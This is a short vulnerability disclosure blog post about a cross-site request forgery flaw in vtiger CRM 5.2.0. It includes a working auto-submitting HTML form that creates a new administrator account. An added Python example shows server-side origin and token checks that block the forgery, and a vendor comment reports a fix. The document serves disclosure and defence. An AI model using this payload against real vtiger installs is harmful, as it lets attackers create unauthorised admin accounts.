This site is soon to be deprecated by http://www.johnleitch.net

Friday, May 21, 2010

vtiger CRM 5.2.0 XSRF

A cross-site request forgery vulnerability in vtiger CRM 5.2.0 can be exploited to create a new admin. The form values can also be sent via GET request, but the resulting user does not have admin privileges.

PoC:
<html>
<body onload="document.forms[0].submit()">
<form name="EditView" method="post" action="http://localhost/index.php">
<input type="hidden" name="module" value="Users" />
<input type="hidden" name="mode" value="create" />
<input type="hidden" name="action" value="Save" />
<input type="hidden" name="user_name" value="new_user" />
<input type="hidden" name="is_admin" value="on" />
<input type="hidden" name="user_password" value="new_password" />
<input type="hidden" name="confirm_password" value="new_password" />
<input type="hidden" name="email1" value="test@test.com" />
<input type="hidden" name="status" value="Active" />
</form>
</body>
</html>
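As an added example (not part of the advisory or of vtiger's own code), the server-side gate that would defeat the PoC above: state-changing actions such as Users/Save are accepted only over POST, only from the site's own origin, and only with the session's synchronizer token, so the forged form (no token, attacker-page origin) and the GET variant are both refused. SITE_ORIGIN, STATE_CHANGING, the csrf_token field and the request shape are assumptions.

```python
import hmac
import secrets
from typing import Mapping, Tuple
from urllib.parse import urlsplit

# Hypothetical request gate for vtiger-style module/action requests
# (added example, not vtiger's own code). State-changing actions are
# only accepted over POST, from the site's own origin, and with the
# session's synchronizer token; everything else fails closed.
SITE_ORIGIN = "http://localhost"        # assumed origin of the vtiger install
STATE_CHANGING = {("Users", "Save")}    # assumed (module, action) pairs that mutate state

def issue_token(session: dict) -> str:
    """Mint a per-session token to embed in legitimate forms."""
    session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]

def request_origin(headers: Mapping[str, str]) -> str:
    """Origin header if present, else scheme://host of Referer, else ''."""
    if headers.get("Origin"):
        return headers["Origin"]
    u = urlsplit(headers.get("Referer", ""))
    return f"{u.scheme}://{u.netloc}" if u.scheme and u.netloc else ""

def gate(method: str, headers: Mapping[str, str],
         form: Mapping[str, str], session: dict) -> Tuple[bool, str]:
    """Return (allowed, reason) for one request."""
    if (form.get("module"), form.get("action")) not in STATE_CHANGING:
        return True, "not a state-changing action"
    if method != "POST":                          # the GET variant the advisory mentions
        return False, f"state change via {method} refused"
    if request_origin(headers) != SITE_ORIGIN:    # missing Origin/Referer also fails
        return False, "cross-origin request"
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or invalid csrf token"
    return True, "ok"

# Constructed sample: the field set the PoC above submits (no token).
FORGED_FORM = {"module": "Users", "mode": "create", "action": "Save",
               "user_name": "new_user", "is_admin": "on",
               "user_password": "new_password", "confirm_password": "new_password",
               "email1": "test@test.com", "status": "Active"}

if __name__ == "__main__":
    session = {}
    token = issue_token(session)
    print(gate("POST", {"Origin": "http://attacker.example"}, FORGED_FORM, session))
    print(gate("POST", {"Origin": SITE_ORIGIN}, dict(FORGED_FORM, csrf_token=token), session))
```

A request with neither Origin nor Referer is treated as cross-origin, which is the fail-closed choice for browsers of the era that did not send Origin.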

4 comments:

  1. Hi

    We have fixed this issue, test this with vtiger CRM 5.2.0 RC which will be out in 5-6 days.
